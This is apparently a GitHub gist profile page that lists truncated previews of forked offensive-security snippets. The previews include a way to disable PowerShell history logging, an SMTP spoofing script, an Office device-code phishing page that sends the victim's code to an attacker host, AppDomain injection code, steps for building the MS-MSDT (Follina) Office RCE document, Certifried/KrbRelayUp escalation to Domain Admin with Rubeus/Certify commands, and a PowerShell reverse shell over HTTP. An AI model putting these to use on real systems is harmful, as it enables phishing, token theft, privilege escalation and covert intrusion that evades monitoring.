Skip to content

Instantly share code, notes, and snippets.

Avatar

Steve Borosh rvrsh3ll

View GitHub Profile
@rvrsh3ll
rvrsh3ll / info.txt
Created Oct 5, 2022 — forked from hook-s3c/info.txt
Disable Powershell logging
View info.txt
Logs are held by default in the user profile:
\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
this directory also hosts per-application logs
--------------------------------------------------------------
Disable Logging...
remove-module psreadline
@rvrsh3ll
rvrsh3ll / spoof.py
Created Oct 3, 2022 — forked from ustayready/spoof.py
Simple unfinished SMTP spoof script for use with Office365 DirectSend SmartHosts
View spoof.py
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email import encoders
import ssl
import email
import argparse
@rvrsh3ll
rvrsh3ll / S3UpDown.ps1
Created Aug 21, 2022 — forked from pmolchanov/S3UpDown.ps1
Quick n Dirty S3 Upload/Download for Powershell
View S3UpDown.ps1
# Upload
&{
$ErrorActionPreference = 'Stop'
$AWSRegion = "us-east-1"
$AWSAccessKeyId = "TODO: Access Key"
$AWSSecretAccessKey = "TODO: Secret Access Key"
$BucketName = "TODO: Bucket Name"
[System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms") | Out-Null
$OpenFileDialog = New-Object System.Windows.Forms.OpenFileDialog
$OpenFileDialog.ShowDialog() | Out-Null
@rvrsh3ll
rvrsh3ll / generate.html
Created Aug 1, 2022 — forked from Mr-Un1k0d3r/generate.html
office device code phishing
View generate.html
<!-- This page can be formatted to look like something more interesting -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<script>
$.get("https://cors-anywhere.herokuapp.com/https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0&client_id=d3590ed6-52b3-4102-aeff-aad2292ab01c&resource=https://graph.windows.net").done(function(data) {
$.get("https://attackercontrolled.com/?id=" + data.device_code);
document.write(data.message);
});
</script>
@rvrsh3ll
rvrsh3ll / FindingComputersWithLocalAdmin.md
Created Jun 29, 2022 — forked from leechristensen/FindingComputersWithLocalAdmin.md
Useful cypher queries to find computers that are local admin on other computers, or to find groups containing bother users/computers.
View FindingComputersWithLocalAdmin.md

Computer accounts added to local admins on machines via a group in the local admins

MATCH p1 = (c1:Computer)-[r:MemberOf*1..]->(g1:Group)
WITH c1,g1
MATCH p2 = (g1:Group)-[r:AdminTo]->(c2:Computer)
RETURN c1.name As Principal,c2.name AS Target,g1.name AS ViaGroup

Computer accounts added to local admins on machines explicitly

@rvrsh3ll
rvrsh3ll / fxstmp.cs
Created Jun 1, 2022 — forked from code-scrap/fxstmp.cs
FXSTMP AppDomain Injection. - FXSTHIS!
View fxstmp.cs
using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
public sealed class MyAppDomainManager : AppDomainManager
{
public override void InitializeNewDomain(AppDomainSetup appDomainInfo)
{
@rvrsh3ll
rvrsh3ll / ms-msdt.MD
Created May 30, 2022 — forked from tothi/ms-msdt.MD
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process
View ms-msdt.MD

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

  1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.
@rvrsh3ll
rvrsh3ll / certifried_with_krbrelayup.md
Created May 17, 2022 — forked from tothi/certifried_with_krbrelayup.md
Certifried combined with KrbRelayUp: non-privileged domain user to Domain Admin without adding/pre-owning computer accounts
View certifried_with_krbrelayup.md

Certifried combined with KrbRelayUp

Certifried (CVE-2022-26923) gives Domain Admin from non-privileged user with the requirement adding computer accounts or owning a computer account. Kerberos Relay targeting LDAP and Shadow Credentials gives a non-privileged domain user on a domain-joined machine local admin access on (aka owning) the machine. Combination of these two: non-privileged domain user escalating to Domain Admin without the requirement adding/owning computer accounts.

The attack below uses only Windows (no Linux tools interacting with the Domain), simulating a real-world attack scenario.

Prerequisites:

@rvrsh3ll
rvrsh3ll / Program.cs
Created May 12, 2022 — forked from dmchell/Program.cs
Exploit for Active Directory Domain Privilege Escalation (CVE-2022–26923)
View Program.cs
// Exploit for Active Directory Domain Privilege Escalation (CVE-2022–26923)
// Author: @domchell - MDSec
// This exploit can be used to update the relveant AD attributes required to enroll in a machine template as any machine in AD using an existing machine account
// Adjusting MS-DS-Machine-Account-Quota is not sufficient to stop this attack :)
// Steps:
// 1. Escalate on any workstation (hint: krbrelayup ftw)
// 2. Execute UpdateMachineAccount.exe as SYSTEM
// 3. Enroll in machine template e.g. (Certify.exe request /ca:"ca.evil.corp\\CA" /template:Computer /machine /subject:CN=dc.evil.corp
// 4. Request a TGT using the certificate e.g. (Rubeus.exe asktgt /user:dc$ /domain:evil.corp /dc:dc.evil.corp /certificate:<base64 cert> /enctype:AES256)
@rvrsh3ll
rvrsh3ll / JEWebDav.ps1
Created May 10, 2022 — forked from darkquasar/JEWebDav.ps1
Simple WebDav Server in Powershell
View JEWebDav.ps1
<#
Obtained from https://github.com/re4lity/subTee-gits-backups/blob/master/JEWebDav.ps1
#>
<#
.SYNOPSIS
Simple Reverse Shell over HTTP. Deliver the link to the target and wait for connectback.
Read And Write Files Over WebDAV Proof Of Concept